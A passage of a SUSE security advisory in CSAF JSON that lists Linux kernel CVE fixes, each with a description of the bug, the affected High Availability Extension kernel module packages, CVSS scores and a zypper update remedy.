"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68773",
"url": "https://www.suse.com/security/cve/CVE-2025-68773"
},
{
"category": "external",
"summary": "SUSE Bug 1256586 for CVE-2025-68773",
"url": "https://bugzilla.suse.com/1256586"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68773"
},
{
"cve": "CVE-2025-68775",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68775"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/handshake: duplicate handshake cancellations leak socket\n\nWhen a handshake request is cancelled it is removed from the\nhandshake_net-\u003ehn_requests list, but it is still present in the\nhandshake_rhashtbl until it is destroyed.\n\nIf a second cancellation request arrives for the same handshake request,\nthen remove_pending() will return false... and assuming\nHANDSHAKE_F_REQ_COMPLETED isn\u0027t set in req-\u003ehr_flags, we\u0027ll continue\nprocessing through the out_true label, where we put another reference on\nthe sock and a refcount underflow occurs.\n\nThis can happen for example if a handshake times out - particularly if\nthe SUNRPC client sends the AUTH_TLS probe to the server but doesn\u0027t\nfollow it up with the ClientHello due to a problem with tlshd. When the\ntimeout is hit on the server, the server will send a FIN, which triggers\na cancellation request via xs_reset_transport(). When the timeout is\nhit on the client, another cancellation request happens via\nxs_tls_handshake_sync().\n\nAdd a test_and_set_bit(HANDSHAKE_F_REQ_COMPLETED) in the pending cancel\npath so duplicate cancels can be detected.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68775",
"url": "https://www.suse.com/security/cve/CVE-2025-68775"
},
{
"category": "external",
"summary": "SUSE Bug 1256665 for CVE-2025-68775",
"url": "https://bugzilla.suse.com/1256665"
},
{
"category": "external",
"summary": "SUSE Bug 1256666 for CVE-2025-68775",
"url": "https://bugzilla.suse.com/1256666"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68775"
},
{
"cve": "CVE-2025-68776",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68776"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/hsr: fix NULL pointer dereference in prp_get_untagged_frame()\n\nprp_get_untagged_frame() calls __pskb_copy() to create frame-\u003eskb_std\nbut doesn\u0027t check if the allocation failed. If __pskb_copy() returns\nNULL, skb_clone() is called with a NULL pointer, causing a crash:\n\nOops: general protection fault, probably for non-canonical address 0xdffffc000000000f: 0000 [#1] SMP KASAN NOPTI\nKASAN: null-ptr-deref in range [0x0000000000000078-0x000000000000007f]\nCPU: 0 UID: 0 PID: 5625 Comm: syz.1.18 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\nRIP: 0010:skb_clone+0xd7/0x3a0 net/core/skbuff.c:2041\nCode: 03 42 80 3c 20 00 74 08 4c 89 f7 e8 23 29 05 f9 49 83 3e 00 0f 85 a0 01 00 00 e8 94 dd 9d f8 48 8d 6b 7e 49 89 ee 49 c1 ee 03 \u003c43\u003e 0f b6 04 26 84 c0 0f 85 d1 01 00 00 44 0f b6 7d 00 41 83 e7 0c\nRSP: 0018:ffffc9000d00f200 EFLAGS: 00010207\nRAX: ffffffff892235a1 RBX: 0000000000000000 RCX: ffff88803372a480\nRDX: 0000000000000000 RSI: 0000000000000820 RDI: 0000000000000000\nRBP: 000000000000007e R08: ffffffff8f7d0f77 R09: 1ffffffff1efa1ee\nR10: dffffc0000000000 R11: fffffbfff1efa1ef R12: dffffc0000000000\nR13: 0000000000000820 R14: 000000000000000f R15: ffff88805144cc00\nFS: 0000555557f6d500(0000) GS:ffff88808d72f000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000555581d35808 CR3: 000000005040e000 CR4: 0000000000352ef0\nCall Trace:\n \u003cTASK\u003e\n hsr_forward_do net/hsr/hsr_forward.c:-1 [inline]\n hsr_forward_skb+0x1013/0x2860 net/hsr/hsr_forward.c:741\n hsr_handle_frame+0x6ce/0xa70 net/hsr/hsr_slave.c:84\n __netif_receive_skb_core+0x10b9/0x4380 net/core/dev.c:5966\n __netif_receive_skb_one_core net/core/dev.c:6077 [inline]\n __netif_receive_skb+0x72/0x380 net/core/dev.c:6192\n netif_receive_skb_internal net/core/dev.c:6278 [inline]\n netif_receive_skb+0x1cb/0x790 net/core/dev.c:6337\n tun_rx_batched+0x1b9/0x730 drivers/net/tun.c:1485\n tun_get_user+0x2b65/0x3e90 drivers/net/tun.c:1953\n tun_chr_write_iter+0x113/0x200 drivers/net/tun.c:1999\n new_sync_write fs/read_write.c:593 [inline]\n vfs_write+0x5c9/0xb30 fs/read_write.c:686\n ksys_write+0x145/0x250 fs/read_write.c:738\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xfa/0xfa0 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\nRIP: 0033:0x7f0449f8e1ff\nCode: 89 54 24 18 48 89 74 24 10 89 7c 24 08 e8 f9 92 02 00 48 8b 54 24 18 48 8b 74 24 10 41 89 c0 8b 7c 24 08 b8 01 00 00 00 0f 05 \u003c48\u003e 3d 00 f0 ff ff 77 31 44 89 c7 48 89 44 24 08 e8 4c 93 02 00 48\nRSP: 002b:00007ffd7ad94c90 EFLAGS: 00000293 ORIG_RAX: 0000000000000001\nRAX: ffffffffffffffda RBX: 00007f044a1e5fa0 RCX: 00007f0449f8e1ff\nRDX: 000000000000003e RSI: 0000200000000500 RDI: 00000000000000c8\nRBP: 00007ffd7ad94d20 R08: 0000000000000000 R09: 0000000000000000\nR10: 000000000000003e R11: 0000000000000293 R12: 0000000000000001\nR13: 00007f044a1e5fa0 R14: 00007f044a1e5fa0 R15: 0000000000000003\n \u003c/TASK\u003e\n\nAdd a NULL check immediately after __pskb_copy() to handle allocation\nfailures gracefully.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68776",
"url": "https://www.suse.com/security/cve/CVE-2025-68776"
},
{
"category": "external",
"summary": "SUSE Bug 1256659 for CVE-2025-68776",
"url": "https://bugzilla.suse.com/1256659"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68776"
},
{
"cve": "CVE-2025-68777",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68777"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: ti_am335x_tsc - fix off-by-one error in wire_order validation\n\nThe current validation \u0027wire_order[i] \u003e ARRAY_SIZE(config_pins)\u0027 allows\nwire_order[i] to equal ARRAY_SIZE(config_pins), which causes out-of-bounds\naccess when used as index in \u0027config_pins[wire_order[i]]\u0027.\n\nSince config_pins has 4 elements (indices 0-3), the valid range for\nwire_order should be 0-3. Fix the off-by-one error by using \u003e= instead\nof \u003e in the validation check.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68777",
"url": "https://www.suse.com/security/cve/CVE-2025-68777"
},
{
"category": "external",
"summary": "SUSE Bug 1256655 for CVE-2025-68777",
"url": "https://bugzilla.suse.com/1256655"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68777"
},
{
"cve": "CVE-2025-68778",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68778"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: don\u0027t log conflicting inode if it\u0027s a dir moved in the current transaction\n\nWe can\u0027t log a conflicting inode if it\u0027s a directory and it was moved\nfrom one parent directory to another parent directory in the current\ntransaction, as this can result an attempt to have a directory with\ntwo hard links during log replay, one for the old parent directory and\nanother for the new parent directory.\n\nThe following scenario triggers that issue:\n\n1) We have directories \"dir1\" and \"dir2\" created in a past transaction.\n Directory \"dir1\" has inode A as its parent directory;\n\n2) We move \"dir1\" to some other directory;\n\n3) We create a file with the name \"dir1\" in directory inode A;\n\n4) We fsync the new file. This results in logging the inode of the new file\n and the inode for the directory \"dir1\" that was previously moved in the\n current transaction. So the log tree has the INODE_REF item for the\n new location of \"dir1\";\n\n5) We move the new file to some other directory. This results in updating\n the log tree to included the new INODE_REF for the new location of the\n file and removes the INODE_REF for the old location. This happens\n during the rename when we call btrfs_log_new_name();\n\n6) We fsync the file, and that persists the log tree changes done in the\n previous step (btrfs_log_new_name() only updates the log tree in\n memory);\n\n7) We have a power failure;\n\n8) Next time the fs is mounted, log replay happens and when processing\n the inode for directory \"dir1\" we find a new INODE_REF and add that\n link, but we don\u0027t remove the old link of the inode since we have\n not logged the old parent directory of the directory inode \"dir1\".\n\nAs a result after log replay finishes when we trigger writeback of the\nsubvolume tree\u0027s extent buffers, the tree check will detect that we have\na directory a hard link count of 2 and we get a mount failure.\nThe errors and stack traces reported in dmesg/syslog are like this:\n\n [ 3845.729764] BTRFS info (device dm-0): start tree-log replay\n [ 3845.730304] page: refcount:3 mapcount:0 mapping:000000005c8a3027 index:0x1d00 pfn:0x11510c\n [ 3845.731236] memcg:ffff9264c02f4e00\n [ 3845.731751] aops:btree_aops [btrfs] ino:1\n [ 3845.732300] flags: 0x17fffc00000400a(uptodate|private|writeback|node=0|zone=2|lastcpupid=0x1ffff)\n [ 3845.733346] raw: 017fffc00000400a 0000000000000000 dead000000000122 ffff9264d978aea8\n [ 3845.734265] raw: 0000000000001d00 ffff92650e6d4738 00000003ffffffff ffff9264c02f4e00\n [ 3845.735305] page dumped because: eb page dump\n [ 3845.735981] BTRFS critical (device dm-0): corrupt leaf: root=5 block=30408704 slot=6 ino=257, invalid nlink: has 2 expect no more than 1 for dir\n [ 3845.737786] BTRFS info (device dm-0): leaf 30408704 gen 10 total ptrs 17 free space 14881 owner 5\n [ 3845.737789] BTRFS info (device dm-0): refs 4 lock_owner 0 current 30701\n [ 3845.737792] \titem 0 key (256 INODE_ITEM 0) itemoff 16123 itemsize 160\n [ 3845.737794] \t\tinode generation 3 transid 9 size 16 nbytes 16384\n [ 3845.737795] \t\tblock group 0 mode 40755 links 1 uid 0 gid 0\n [ 3845.737797] \t\trdev 0 sequence 2 flags 0x0\n [ 3845.737798] \t\tatime 1764259517.0\n [ 3845.737800] \t\tctime 1764259517.572889464\n [ 3845.737801] \t\tmtime 1764259517.572889464\n [ 3845.737802] \t\totime 1764259517.0\n [ 3845.737803] \titem 1 key (256 INODE_REF 256) itemoff 16111 itemsize 12\n [ 3845.737805] \t\tindex 0 name_len 2\n [ 3845.737807] \titem 2 key (256 DIR_ITEM 2363071922) itemoff 16077 itemsize 34\n [ 3845.737808] \t\tlocation key (257 1 0) type 2\n [ 3845.737810] \t\ttransid 9 data_len 0 name_len 4\n [ 3845.737811] \titem 3 key (256 DIR_ITEM 2676584006) itemoff 16043 itemsize 34\n [ 3845.737813] \t\tlocation key (258 1 0) type 2\n [ 3845.737814] \t\ttransid 9 data_len 0 name_len 4\n [ 3845.737815] \titem 4 key (256 DIR_INDEX 2) itemoff 16009 itemsize 34\n [ 3845.737816] \t\tlocation key (257 1 0) type 2\n [\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68778",
"url": "https://www.suse.com/security/cve/CVE-2025-68778"
},
{
"category": "external",
"summary": "SUSE Bug 1256683 for CVE-2025-68778",
"url": "https://bugzilla.suse.com/1256683"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68778"
},
{
"cve": "CVE-2025-68783",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68783"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: usb-mixer: us16x08: validate meter packet indices\n\nget_meter_levels_from_urb() parses the 64-byte meter packets sent by\nthe device and fills the per-channel arrays meter_level[],\ncomp_level[] and master_level[] in struct snd_us16x08_meter_store.\n\nCurrently the function derives the channel index directly from the\nmeter packet (MUB2(meter_urb, s) - 1) and uses it to index those\narrays without validating the range. If the packet contains a\nnegative or out-of-range channel number, the driver may write past\nthe end of these arrays.\n\nIntroduce a local channel variable and validate it before updating the\narrays. We reject negative indices, limit meter_level[] and\ncomp_level[] to SND_US16X08_MAX_CHANNELS, and guard master_level[]\nupdates with ARRAY_SIZE(master_level).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
